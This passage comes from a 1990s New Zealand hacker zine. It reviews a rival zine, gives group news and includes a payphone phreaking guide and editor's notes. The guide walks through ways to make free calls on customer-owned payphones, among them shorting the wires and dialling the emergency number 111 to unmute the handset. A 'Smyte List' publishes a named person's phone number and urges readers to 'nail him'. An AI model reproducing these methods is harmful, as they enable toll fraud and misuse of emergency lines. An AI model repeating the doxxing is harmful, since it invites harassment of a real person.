password only take printable letters, it will be hard to beat. And you
have a 1 in 65535 chance of fluking it. But by using a slightly more
complicated algorithm and 4 bytes of data, you would have a 1 in 4294967294
chance.
And an even "trickier" one to break is the algorithm in PowerPacker
encrypted executable files. Nico has thought it out well. You type in a
password, and it calculates a word to compare and tell you if the password
is valid, but uses a totally separate algorithm to generate a longword for
the actual decryption key - so any garbageword you make from the compare
word is only going to have a 1 in 65535 chance of being correct... Makes
things a little difficult, eh? And to make it harder the only encrypted
stuff is the actual crunched data - which seems to be crunched differently
than with no password as well, so I can't think of any way, short of formal
cryptanalysis, to get around it.
Well, that's about it from me, but this is only the tip of the iceberg of
what there is to learn before you are even a half-competent hacker in these
here parts... But they are 3 important things that will lead to much more.
* Data wants to be free - so help it out *
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Review: 'ToT' ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
REVIEW: 'Tricks of the Trade' [ToT]
This is the first review that we will be including in the SLi Magazine, but
we hope to expand to reviewing a few others in the future.
[PLEASE NOTE: This is a critical review. Some have said it has been a little
too critical, perhaps that is the case, but the decision is to
be left to you, the reader.]
[BRIEFING]
WHAT? Electronic Magazine.
WHO? Distributed by: Raider.
Content by : Hype, Red Lion, Mutant-X, GreyRat, Nick,
Demogordon, X-Treme and Kevin.
WHEN? 24th December 1994
WHERE? Written by a group of Wellington H/P/A's. Perhaps a couple
of members out of the Wellington region seeming that at
present I am unable to pin-point the locations and identities
of a couple of the 'ToT' writers.
WHY? This question stumped me for a while as I can only give my
opinion. I came up with the following - a) for the pure
reason to educate others coming up in the H/P/A scene,
b) to give 'SLi' a taste of competition (this could be fun!)
or maybe even, c) to get a bit of the limelight.
These are in order of my suspicions from 'A' being the most
likely, to 'C' being the least likely.
HOW? Thought it was pretty damn obvious, but for those of you who
are interested... They got each of the writers to write their
articles down on paper then gave them to the editor to type out
on his dinky li'l 'puter...
[Editors Note: This seems to be the most TIME wasting story
I've EVER heard BUT that's what they did, so
'Raider' said. ]
[CRITICAL REVIEW]
This magazine isn't too bad for the first couple of issues, but admittedly,
the first issue left a little more to be desired.
The idea of there being a variety is 'okay', but that depends on the
individuals for whom the magazine was/is designed.
In my opinion, it appears that 'ToT' is designed with the lesser educated
in the H/P/A scene in mind. There were quite a number of articles in the
second issue of 'ToT' in comparison to any of the 'SLi' issues, but the
articles in 'ToT' were fairly brief and the ideas were a little out-dated.
It appears that 'ToT' is still in the process of deciding where it wants to
go - it would've been a better idea if plans had been made earlier and those
decisions would've made the foundation to start off with. With 'SLi', all
the needy decisions had been made PRIOR to even STARTING the magazine.
'SLi' was a group of companions FAR before it was a magazine - It's
advisable to know who's going to be there when you need them and whether they
can be trusted or not. The only way you can find out is by experimentation.
And that's what we did.
Anyway, going back to 'ToT' and its purpose in the H/P/A scene...
After a good read throughout the magazine, I noticed that there is a fair
deal of information dealing with the Australian telephone network. It may
do a good job there, but WHO are the main people who are most probably
going to make use of the information stored within the bits and bytes?
I may be wrong, but I would say it would be us 'kiwi H/P/A's' who would
benefit most from the information. It looks as though 'ToT' is in too
much of a hurry to be known widespread - 'slow and steady wins the race'
would be a good phrase to put there.
Following is an 'article-by-article review' of 'ToT#2':
[REVIEW]
[Articles One-Three: Clickers]
Clickers. I haven't known of one which has worked yet, but that might just
be that those who have used them had not used them correctly. Strange
that they hadn't managed to work for about four people, but I guess you'll
just have to try them out for yourself considering that I haven't tried
them out myself.
At least you'll get your own BBQ lighter... Pretty sure that they'd make a
pretty good shock device - could be used as a stun gun if they're what I
think they are.
[Article Four: Travel Sickness]
The only flaw I could be sure of commenting on, is the lack of information
on what they [the tablets] actually do to the human body and whether or
not they're safe (or at least not lethal).
If ideas like this one are printed without thought to any consequences they
may have, we may find that a lot of people may suffer injuries due to the
lack of information given to the reader. Mind you, if you're silly enough
to try something without attempting to find out about it beforehand, then
you hold as much responsibility as the person responsible for the printing
of the information given.
[Article Five: Busted???]
Well, I guess I have no problems at all with this article. This is an art-
icle providing information to the reader which does not prompt for any
further action.
[Article Six: Credit Card Calling]
I had just recently covered this in the 'SLi#3' before I had any knowledge
of this article at all - it covered basically the same aspects but I'd tried
to explain it a little more to make sure it was understood better, but this
article is nonetheless okay, even if I disagree with some of the hints to a
certain degree. Still, a good article.
[Article Seven: Nut n Bolt Bomb]
It's already well-known that match heads contain explosive chemicals, but
I think that the writer of this article COULD have at least pointed out how
dangerous this can be - what with the flying shrapnel and the explosiveness
of the match head mixture. I was dismayed at the fact that I couldn't spot
a single safety warning right throughout the entire magazine at all.
[Note: This has already been covered in a few other mags prior to this one,
ie. early editions of Phrack among others.]
[Article Eight: Hacking Calling Cardz]
The article was a little vague, but (because of previous experiences with
this scenario) I could see what they were trying to explain. I find that
if you're more polite, you get what you want quicker instead of having to
bumble around with other unnecessary situations - no one likes a pushy
operator, so you can imagine how the victims would feel!
[Article Nine: One for the Neighbourz]
Well... I don't really have a comment on this one - read it for yourself..
I'm kind of, uh, "speechless". =)
[Article Ten: Hot Air Balloon]
A nicely presented article. I don't think I'd bother trying to build one
though considering I'd find it a fire-hazard if put together wrong and the
chances are, I'd do it wrong. Still, worth a try if you're into this sort
of thing and are competent in doing so. =)
[Article Eleven: Hidenburg Balloon]
This is just your basic acid-base explosion when you bring a naked flame
to Hydrogen[?]. A nice little bang, but watch for flying pieces of glass if
there are any - should be careful.
[Article Twelve: Hintz n Tipz for Pot Planting]
A nice little article on (as it says in the title) hints and tips for the
planting of marijuana plants. Not bad.. not bad at all. Even if originally
posted on "Bad Sector BBS" and then (with the writer's permission, of course)
transferred to the magazine - at least it's making use of your resources. =)
[Article Thirteen: How to Pass a Lie Detector Test]
A very entertaining article.. What can I say? I enjoyed reading it.
... But WHERE are you going to have to fake a lie detector test. If you're
foolish enuff to get caught, you can guarantee they have enough on you and
they WON'T need you to confirm or deny it. Well, I guess if you're being
interrogated about certain activities concerning friends, this could be handy.
Still, a good read - you never know when you might need it.
[Article Fourteen: Just 4 Fun]
Uh, short. Very short in fact. A space filler?
[Article Fifteen: Corn Bombs]
A simple, no nonsense bomb.
[Article Sixteen: Fucking up a BBS]
Old concept. Has been brought up in MANY different places, magazines,
person-to-person chats, etc... Simple commonsense really. Telecom seems
to be tightening up the security of other peoples services - about time
they'd wised up to the old trick!
[Article Seventeen: Hacking CityNet/Genie]
The first part showed potential for something not to laugh at, although,
it was an old trick and many people had already been aware of the fact that
it was something done quite often. But, why bother when you can just walk
in and make your own account? Even one with a fake name. All you need to
do is simply USE YOUR COMMONSENSE. As for the hacking of CityNet/Genie
passwords with the user's names, you can't guarantee that it's going to
work. Is it really worth the trouble? Are you going to bother finding out
EVERY SINGLE USER NAME on the system and sit there trying them all day/night?
I guess you could spend a couple of minutes/hours/days writing a proggy/shell
script to do it for you, but I wouldn't want to tie my phoneline up!
The service is free, so isn't that enough?
[Article Eighteen: Strange Auzzie Numberz]
So, how many people out there, who've read this article, are going to fly,
float, swim, etc... to Australia? This is of no use to you if you're not
planning on visiting them within this half-decade or so. The chances of
any flaws, from today still being around by that time are pretty slim due to
the technology boom that should occur in the next few years. Although, this
is useful if you have friends/associates living in Aussie who you like to
keep in contact with.
[Article Nineteen: Hackerz Hit Telecom]
Yet another article dealing with the land mass north-west of New Zealand.
The article was okay for light reading, but was of little interest to my-
self. Similar to 'Article Five: Busted???' in that it is a "media reported"
incident.
[Article Twenty: 008 Diverter]
Refer to [Article Eighteen: Strange Auzzie Numberz].
[Article Twenty-One: Eureka]
One word: Childish...
Oh, and a couple more:
... next please...
[Article Twenty-Two: Making Napalm]
I highly disliked the example of a cat being used and I have already voiced
my opinion on this to 'Raider'. I'm not too sure whether they [the writers]
realize the effects of their ideas seeing that there are going to be those
people/kids around who will try ANYthing for the sheer sake of it. Other
than the use of the cat in the article, there isn't too much more I'd comment
on. Interesting mixture - could be useful...... somewhere.. =)
[Article Twenty-Three: 10 Metre Cigarette Lighter]
The 'cigarette lighter' trick seems okay, the sugar/flour idea is an ancient
idea created 'decades' ago. As for the petrol soaked rags, I don't think
there are many people who are planning on trying to KILL the 'victim' - at
least I'd like to think not.
[Article Twenty-Four: Exploding Rockz]
Could be sore. How do you feel about 'hail'? =)
[Article Twenty-Five: How to Cure a Hangover]
Interesting tips. I'll keep them in mind if I need them!
Oh, another tip for how to cure a hangover - so I was informed - just eat a
lemon. I know it would surely bring ME down to earth pretty quickly!
[Article Twenty-Six: Coca-Cola Recipe]
Is it really worth the trouble when, in some places, you can get 500ml
worth for a single dollar? What if you stuff up? You end up with a large
amount of worthless goo - mind you, you could try selling it to the city
council to use as TAR. *grin*
[Editors Note: Also, Coca, or the leaf of the coca plant, [Cocaine] would
be a LOT harder to find at the local supermarket.]
[Article Twenty-Seven: Voodoo Magic]
Each to one's own. If you believe it, go for it, I guess.
[Article Twenty-Eight: Excusez for Missing Class]
Lacked information on the consequences of truancy, and take it from someone
who's knowledgeable of these acts. It's just not worth it. As for the cheat-
ing in exams - What if you're caught? You may as well forget about getting
a job you'll enjoy - you'll be stuck with cleaning floors and packing
burgers, fries and Coke. Sounds fun, don't it?
[Editor's Note: Or making Coke!]
[Article Twenty-Nine: Greetz and Msgz to Contactz]
The title says it all... Couldn't find anything wrong with it. =)
[Article Thirty: ToT - The Future?]
Interesting reading. 'Know thine enemy'. Hehe, nah, I don't think it would
come to that, but just to be on the safe side... *maniacal grin* *wink*
[Article Thirty-One: Last Wordz]
Normally skipped by the reader, but worth a read anyway.
[FINAL ANALYSIS]
Some of the ideas expressed in 'ToT#2' had already been 'spread about'
prior to the release of 'ToT Magazine #2', so repeating the ideas wouldn't
have made much impact - especially if a lot of people know about them
already. If anything, it's a waste of disk space (j/k!). Some of the art-
icles, I found rather childish and others a little dangerous - not to mention
a lack of warnings which was one of my main concerns (it was something we'd
also forgotten about in our previous mags, but you wise up after chats with
Telecom/other authorities!).
As far as I'm concerned, I'd rate this magazine as a 7/10 (I haven't come
across a 10 yet, so consider me to be a hard marker.. ;) ). The magazine
on the whole was 'nice light reading' seeing that the articles are, on
average, between a third of a page and a page, in length. Not a bad try
for a local Wellington H/P/A group really seeing that they had at least
SOMEthing to say. If you've got a small attention span, and are new to the
H/P/A scene, then this is the magazine for you.
I found it to be of no practical use to me, but it may do for you - it depends
on WHAT you're actually looking for. You don't have to take my word for it -
Why not just grab a copy and read it for y'self?
Finally, I'd just like to say - Quality, not Quantity is the key to success
with a good magazine. Maybe if the editor was interested less in the latter,
and more in the former, it may show promise.
Many electronic magazines don't start out the best - due to lack of organ-
isation - but they normally get sorted out by about their third issue if
you're really serious about it.
[NOTES]
We, at SLi, welcome ANY comments at all and thoughts of setting up a
'Letters to the Editors' section in the magazine are in the process of being
thought over. Letters will, or will not, be printed depending on whether
it's wanted or not - in respective order.
We can be reached at:
NOTE: All Internet addresses at the moment are on hold _DO_NOT_ e-mail us
at _ANY_ of our previous e-mail addresses.
This email address works at the time of publication:
hacker_m@ix.wcc.govt.nz
Snail Mail:
SLi
PO Box 3030
Onekawa
Napier
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ SLi ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
In this part of the mag, WE [the guys and gals of SLi] tell ya what the group
is doing.
WHAT IS SLi? and WHAT WE STAND FOR:
Freedom and the right to publish our views and the RIGHT to TEACH _YOU_
what we know. Read the article "Honour" if you want to see what rules
we TRY to live by.
Members resigned by choice from SLi:
Digital Omega -- Quit due to personal reasons.
Telco: Well CyntaxEra's "misuse of a telephone" ooops has sorted
itself out...
BBS: Is finally UP AND running, but VERY private. It's located in
Wellington, New Zealand.
Email hacker_m@ix.wcc.govt.nz for information on the number and
other miscellaneous info.
OFFICIAL SLi BBS's
~~~~~~~~~~~~~~~~~~
(ie. run by SLi MEMBERS)
BBS NAME            MEMBER   PHONE NUMBER/S                 SPEED MODEM
Hacker's Haven BBS  Thorium  +64-6-844-DATA(+646 844 3282)  28.8k BPS    *
SLi BBS             Eon      +64-4-475-SCAN(+644 475 XXXX)  14.4k BPS    !?
* = Only online sometimes.
! = No K0d3z kiddies and NO Warez Puppies!! :)
? = Age limit of 17+. All files checked. UNIX system. 79Meg+ H/P/V
files. NO Anarchy, NO Porn, NO Codez and NO Warez permitted on system!
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ COCOT Phreaking ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
COCOT Phreaking
~~~~~~~~~~~~~~~
For those of you who are reading this article without any previous knowledge
of the common everyday COCOT, I'll begin by giving you a brief outline of this
wonderfully strange object... [insert 'The Twilight Zone' movie soundtrack
here]
C ustomer
O wned
C oin
O perated
T elephone.
There. Nothing to it. It's one of those small telephones you find in the old
shopping mall - in most cases, if there happens to be a 'Telecom Card/Coin
Phone' within a 3-metre radius, the chances of there being one around greatly
decreases - or your handy service station. In the case of the latter suggest-
ion, there'll almost always be an attendant keeping an eye out on you, but if
they're slightly busy, they'll most probably be keeping their eyes out for
other things.
[Note: Telecom does know of the shortfalls of these fones, and warns their
"clients" of the problems these fones have. So the attendants MIGHT
know what's wrong with his/her fone and keep an eye out.]
In the following, I'll just go over my 'observations' of these fones, and at-
tempt to explain a bit about how they work - well, as far as I'm aware of, any-
way.
[Note: Considering the fact that New Zealand doesn't have the same 'Freedom of
Speech' Act, as there is in the States, I'm a little wary of writing
this article, so I'll try and keep the ideas to a minimum - that's all
they are... ideas.]
[Type One]
Description: 'Blue-Buttoned Telephone'.
[NOTE: If you try 'Idea One' you may be able to use any 'Blue-Buttoned' fone,
but, if you are trying 'Idea Two', you must use the particular type
which is listed below.]
LCD Display shows a blinking 'COIN' which takes up the entire LCD display.
When dialling, it doesn't bring up the number onto the display, but you
SHOULD be able to hear it dialling.
Major Colours: Blue, white, grey and black.
[Idea One]
Get a pin. Dial the number you want to call, push the pin through the wire,
running from the fone into the wall, so it shorts the wires together thus
making it impossible for the fone to disconnect. Hang up the fone and pick
it back up. Dial '111' and pull the pin out. There you go - a free call.
[Idea Two]
Pick up the receiver and dial the number you want - as though you would nor-
mally. It should dial the number for you, and if the line isn't busy, you
should be put through okay. Once the person answers, dial '111' and it should
free you from the mute - allowing you to speak freely with the person you have
just called. If you get a 'no-such-number' answer, then perhaps there is a
toll-bar on the phone line of the COCOT, otherwise, try another COCOT.
[Explanation]
With these 'blue-buttoned fones', you get your dial-tone and you're even per-
mitted to use the keypad. The only problem... the microphone. The micro-
phone is muted to stop the person from using the telephone and (from what I'm
aware of) can only be 'de-muted' by the user of the telephone inserting a
coin, OR dialling '111' [the emergency phone number in NZ - for those of you
who are unfamiliar with the number].
After the numbers '111' are dialled - regardless of whether the phone has a
dial-tone, or not - the microphone loses the 'mute button', and allows the
user of the fone to speak into the microphone whilst allowing the receiver
of the call to hear the caller. Of course, the receiver of the phone is
unchanged, which allows the caller to hear the dial-tone and the recipient
of the call.
[Type Two]
Description: 'Brown-Buttoned Telephone'
[NOTE: They have a big orange button with an 'A' on it.]
These fones are becoming less common, but are still around. They have been
replaced by either the 'blue-buttoned fone' or have an annoying 'beep' add-
ed especially to help us fone phreaks out (NOT!). A few times, I have come
across the odd one or two which have an interrupted dial-tone - a fake one
which sticks around until you drop your dandy coin into the coin slot.
Major Colours: Brown, orange, white and traces of black.
[Idea One]
Attain yourself a DTMF dialler and wander off to your nearest 'brown buttoned
telephone'. Just put the dialler's microphone up to the UN-MUTED microphone
on the telephone's receiver, and dial away. Once the person answers, begin to
talk. =)
[Explanation]
The coin's only use appears to be to give the caller access to the dialling
pad. Well, the older versions seem to give that appearance - seeing that
there are newer versions hanging about with similar problems (ie. the false
dial-tone). The outer casing (the telephone case) is the same and the only
way to tell the difference is to try things out for yourself. This is a case
of just hoping that you're lucky enough to find the ones which work.
[Type Three]
Description: 'The Red Phone'
These are these rather big, rather OLD, rather chunky, rather, err, well,
RED fones. They have a little red button on them that automatically dials
'111'.
Major Colours: Uh, a kinda RED colour. Has traces of white on the keypad for
the numbers.
[Idea One]
The keypad is the only thing not connected so the ol' DTMF trick will work
fine. They seem to be in a lot of T.A.B.'s [horse betting places for those of
you who don't know that already]. Simple, ain't it?
[Idea Two]
I assume you can also pulse dial using the switch-hook.
For those who don't know how to use pulse-dialling, just tap the switch-hook
down for a 'split-second' the number of times you need to dial the number with
a space of silence between each number (so it knows when the next number is
being dialled). It is a VERY old trick, but I thought I'd add it for those
interested.
[NOTE: These apply to NZ, but I can't remember what they are everywhere else
and plus, I'm not going to type down ALL of the respective numbers!]
Phone Number      Number of times
                  to press s-h
     0        -        10
     1        -         9
     2        -         8
     3        -         7
     4        -         6
     5        -         5
     6        -         4
     7        -         3
     8        -         2
     9        -         1
ie. Say you want to dial, 001-202-542-873, you would do this:
tap the s-h 10 times, pause, 10, pause, 9, pause, 8, pause, 10, pause,
8, pause, 5, pause, 6, pause, 8, pause, 2, pause, 3, pause, 7.
An easy way of remembering it, is to simply add the number to the amount of
taps of the switch-hook and it should equal 10.
This is an old idea, but it works on these old phones.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Smyte List ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Well, as in all other SLi mags - except #1 - here's a person [and
his info] who has done a pretty stupid thing, and got the members of
SLi pissed at him.
Name Info Reason
--------------------+-------------------------+------------------------------
Johnathon Patterson +64-4-527-8021 Pissed CyntaxEra off - not to
aka [-=[THE_FLY]=-] mention a LOT of other ppl.
[Eon's note: This guy insulted
Cyntax and I. He DESERVES
ALL he GETS. Nail him.]
[Note: If you have someone who has pissed you off lately, you want to 'get in
touch' with them and think that we MIGHT have their info, just giz us
a bell with your reason for getting back at this person and we'll see
what we can do for ya.]
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Editors Knotez ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Damn it! Yet another one of these things! :)
Ahh, well, me and Cyntax 'ave given up dak,
Oh, yeah - Happy April Fools! :=)
Well, it's the end of another SLi mag. Guess it's getting rather predict-
able now.
Well, SLi BBS PRIVATE NODE is up! Email hacker_m@ix.wcc.govt.nz if you
want the number and instructions to login including the bbs passwd and
stuff. Oh, BTW, it's 14.4... :)
ALSO!!! if you want to send us a note, post it to our PO BOX.
Here is the shout out you wanted MysTix!
PS. SLi V should be out in 3-4 months.
Yeah someone wrote me asking if there was a way to turn off call waiting.
Now, I think it's *52.
Oh, and I'd like to say TELECOM RISK MANAGEMENT (aka. Telco security)
isn't that bad. Hey, I'd even accept some feedback from them. :) Anyone
wanna write me a letter? I'm sure you can find my address :\ I take that
back. I'll just say, "tnx Heather" :-<
[Maybe I was wrong. They just killed Cyntax's 3-Way and stuff cause of her
VMB "ooops". So be it.]
God, that Bill Gates guy is a s[h]muck! What an _elite_ haircut he has!
And, the glasses! Yuck! Oh, god! Look at the tie!! Yellow and black
rectangles! Of course this is MY opinion and may not be that of the
civilized world.
[CyntaxEra's Note: Apologies go out to any people reading this who have that
tie - we're very sorry for you. ;)]
Another Tip: SLi uses 2048 bit encryption on our IMPORTANT junk, and
512 on our misc stuff - thanks to PGP 2.4x <not the new one, 'cause the US
Government have endorsed it>.
Any BBS's that would like to become an OFFICIAL SLi release point, please
POST a letter to the SLi PO Box, or email me: HACKER_M@IX.WCC.GOVT.NZ.
A Final NOTE:
We are ALL New Zealanders - not black, not white but united under ONE
flag. We are one nation. May we once again become one people.
Our flag is the symbol of our country, to all who spit on it, to all who
stomp on it. Take note that thousands died for that flag - both white and
black! Do not EVER stand on, or deface, OUR symbol of OUR country, for we
are ONE people united. If you wish to show your disapproval, do it in a
righteous and honourable way. Not in such a childish and immature way
without any forethought at all.
[This is in accordance to the current disagreements between NZ and a small
percentage of Maori New Zealanders in reference to this year's Waitangi Day -
A day which should have been celebrated by all. Sadly the acts of a few have
made this country two people under one divided flag. Be ashamed of yourself
all who took part in the division of New Zealand, for these acts will live in
the history of New Zealand forever as the day New Zealanders became two
peoples.]
Well, I'll see you all 'round... 'Till next time...
.
Life is Cursed.
For all who live must die.
eof